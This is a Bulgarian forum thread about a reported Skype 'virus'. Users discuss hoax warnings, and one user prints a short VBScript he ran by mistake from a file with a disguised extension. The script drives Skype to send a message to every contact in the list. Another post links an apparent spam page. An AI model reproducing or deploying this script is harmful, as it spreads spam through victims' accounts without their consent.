Mindzu написа:
Реклама
Collapse
Съобщение
Collapse
No announcement yet.
ВНИМАНИЕ!!! Скайп Вирус!
Collapse
X
-
ако си хлапе или с лапешки акъл, и нещо искаш да правиш мръсно на martin_ludiq пускаш такова съобщение... за да не говорят с него другите ... все едно той не може да си смени ника или регистрацията ... не знам доколко е реалистично софтуеър да може да повреди хардуеър - както се твърди в повечето такива ...
Коментар
-
niko_ymn написа:ако си хлапе или с лапешки акъл, и нещо искаш да правиш мръсно на martin_ludiq пускаш такова съобщение... за да не говорят с него другите ... все едно той не може да си смени ника или регистрацията ... не знам доколко е реалистично софтуеър да може да повреди хардуеър - както се твърди в повечето такива ...
Коментар
-
SHB написа:Тегля си аз някакво файлче,не помня за какво ,цъквам два пъти и о’чудо!Изпрати съобщение на целия ми контакте лист...Колко съм писал че е спам-изтри ми се клавиатурата.Някакво просто скриптче с променено разширение колко може да ти вгорчи живота.Код:set NrrlP = WScript.CreateObject("Scripting.FileSystemObject")set uDlVA = wscript.createobject("wscript.shell")set yADAl = WScript.CreateObject("Skype4COM.Skype", "Skype_")yADAl.Client.Start()yADAl.Attach()For Each GAG In yADAl.FriendsyADAl.SendMessage GAG.handle,"some text here* "nextmsgbox "bY Spamer URL (’’)"
Коментар
-
niko_ymn написа:не знам доколко е реалистично софтуеър да може да повреди хардуеър - както се твърди в повечето такива ...Alfa 159 SW 2.4 Ti
Fiat Marea '99 1.6 16V ELX
"...внимавай че тези италиански кочини много вървят."
Коментар
-
Незнам тези но е тоя спам ще обиколи света за нула време http://www.marica-iztok.com/jaro/To_all_my_friend.htmlПравило № 1- Нещо което работи не се пипа!!!
Правило № 2- На майстори и наркОмани вяра да нямаш!
Правило № 3- Винаги спазвай правило № 1
Коментар
Реклама
Collapse
Коментар